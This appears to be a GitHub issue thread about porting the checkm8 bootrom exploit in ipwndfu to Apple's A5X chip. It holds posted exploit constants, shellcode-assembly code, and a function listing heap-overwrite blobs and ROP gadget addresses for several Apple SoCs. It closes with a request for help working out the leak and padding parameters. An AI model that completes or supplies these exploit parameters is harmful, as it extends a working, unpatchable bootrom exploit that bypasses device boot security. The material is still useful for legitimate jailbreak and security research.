Where can I get these values: https://github.com/axi0mX/ipwndfu/blob/0e28932ec6a2a570b10fd77e50bda4216418cd98/checkm8.py#L441
Hi, how are you? Does this have anything to do with all the malware in my calendar? I had to change all my passwords. I'm so sorry if I messed something up somehow.
OK, I think I have now found all the values. Since the tool is unstable, how can I test that it works properly? Right now I sadly only have Windows 10 and WSL... These are my findings for the A5X; could someone please confirm they are correct:
if cpid == 0x8945:
constants_usb_s5l8945x = [
0x34000000, # 1 - LOAD_ADDRESS
0x65786563, # 2 - EXEC_MAGIC
0x646F6E65, # 3 - DONE_MAGIC
0x6D656D63, # 4 - MEMC_MAGIC
0x6D656D73, # 5 - MEMS_MAGIC
0x72F4+1, # 6 - USB_CORE_DO_IO
]
constants_checkm8_s5l8945x = [
0x3402D888, # 1 - gUSBDescriptors
0x3402DDE0, # 2 - gUSBSerialNumber
0x7878+1, # 3 - usb_create_string_descriptor
0x3402C1B4, # 4 - gUSBSRNMStringDescriptor
0x34039800, # 5 - PAYLOAD_DEST
PAYLOAD_OFFSET_ARMV7, # 6 - PAYLOAD_OFFSET
PAYLOAD_SIZE_ARMV7, # 7 - PAYLOAD_SIZE
0x3402D904, # 8 - PAYLOAD_PTR
]
s5l8945x_handler = asm_thumb_trampoline(0x34039800+1, 0x7D60+1) + prepare_shellcode('usb_0xA1_2_armv7', constants_usb_s5l8945x)[8:]
s5l8945x_shellcode = prepare_shellcode('checkm8_armv7', constants_checkm8_s5l8945x)
assert len(s5l8945x_shellcode) <= PAYLOAD_OFFSET_ARMV7
assert len(s5l8945x_handler) <= PAYLOAD_SIZE_ARMV7
return s5l8945x_shellcode + '\0' * (PAYLOAD_OFFSET_ARMV7 - len(s5l8945x_shellcode)) + s5l8945x_handler
def all_exploit_configs():
    """Return every DeviceConfig this tool knows about, in a fixed order.

    Each entry carries an iBoot version string, the CPID it matches, a
    numeric third field (given for the 32-bit SoCs, None for the 64-bit
    ones), the per-SoC overwrite blob, and two trailing fields (None for
    the 32-bit SoCs, small integers for the 64-bit ones).  What the third,
    fifth and sixth fields mean is defined by DeviceConfig itself, which
    is declared outside this function.

    NOTE(review): each blob concatenates a str of NUL padding with the
    output of struct.pack(); that is only valid on Python 2, where str
    and bytes are the same type.
    """

    def packed_after_zeros(zero_count, fmt, *fields):
        # NUL padding followed by one little-endian struct record.
        return '\0' * zero_count + struct.pack(fmt, *fields)

    # Per-SoC gadget addresses; each is packed twice into the 64-bit
    # records below.
    gadget_t8010 = 0x10000CC6C
    gadget_t8011 = 0x10000CD0C
    gadget_t8015 = 0x10000A9C4

    blob_s5l8945x = packed_after_zeros(0x6c0, '<20xI4x', 0x34000000)
    blob_s5l8947x = packed_after_zeros(0x660, '<20xI4x', 0x34000000)
    blob_s5l895xx = packed_after_zeros(0x640, '<20xI4x', 0x10000000)
    blob_t800x = packed_after_zeros(0x5C0, '<20xI4x', 0x48818000)
    blob_s5l8960x = packed_after_zeros(0x580, '<32xQ8x', 0x180380000)
    blob_t8010 = packed_after_zeros(
        0x580, '<32x2Q16x32x2QI',
        gadget_t8010, 0x1800B0800, gadget_t8010, 0x1800B0800, 0xbeefbeef)
    blob_t8011 = packed_after_zeros(
        0x500, '<32x2Q16x32x2QI',
        gadget_t8011, 0x1800B0800, gadget_t8011, 0x1800B0800, 0xbeefbeef)
    blob_t8015 = packed_after_zeros(
        0x500, '<32x2Q16x32x2Q12xI',
        gadget_t8015, 0x18001C020, gadget_t8015, 0x18001C020, 0xbeefbeef)

    # (iBoot version, CPID, third field, overwrite blob, fifth, sixth).
    # The trailing comments repeat the timings recorded by the original
    # author for each SoC.
    rows = (
        ('iBoot-1062.2', 0x8945, 620, blob_s5l8945x, None, None),
        ('iBoot-1458.2', 0x8947, 626, blob_s5l8947x, None, None),  # S5L8947 (DFU loop) 1.97 seconds
        ('iBoot-1145.3', 0x8950, 659, blob_s5l895xx, None, None),  # S5L8950 (buttons) 2.30 seconds
        ('iBoot-1145.3.3', 0x8955, 659, blob_s5l895xx, None, None),  # S5L8955 (buttons) 2.30 seconds
        ('iBoot-1704.10', 0x8960, 7936, blob_s5l8960x, None, None),  # S5L8960 (buttons) 13.97 seconds
        ('iBoot-2651.0.0.1.31', 0x8002, None, blob_t800x, 5, 1),  # T8002 (DFU loop) NEW: 1.27 seconds
        ('iBoot-2651.0.0.3.3', 0x8004, None, blob_t800x, 5, 1),  # T8004 (buttons) NEW: 1.06 seconds
        ('iBoot-2696.0.0.1.33', 0x8010, None, blob_t8010, 5, 1),  # T8010 (buttons) NEW: 0.68 seconds
        ('iBoot-3135.0.0.2.3', 0x8011, None, blob_t8011, 6, 1),  # T8011 (buttons) NEW: 0.87 seconds
        ('iBoot-3332.0.0.1.23', 0x8015, None, blob_t8015, 6, 1),  # T8015 (DFU loop) NEW: 0.66 seconds
    )
    return [DeviceConfig(*row) for row in rows]
Hello. I am trying to develop checkm8 for the A5X. I have already found all the addresses for the necessary constants and functions (USB and magic addresses). I tried to figure out the leak, the number of requests and the padding, but I can't sniff USB. How can I do it through the SecureROM source code? And please tell me if there is something else I need... Thanks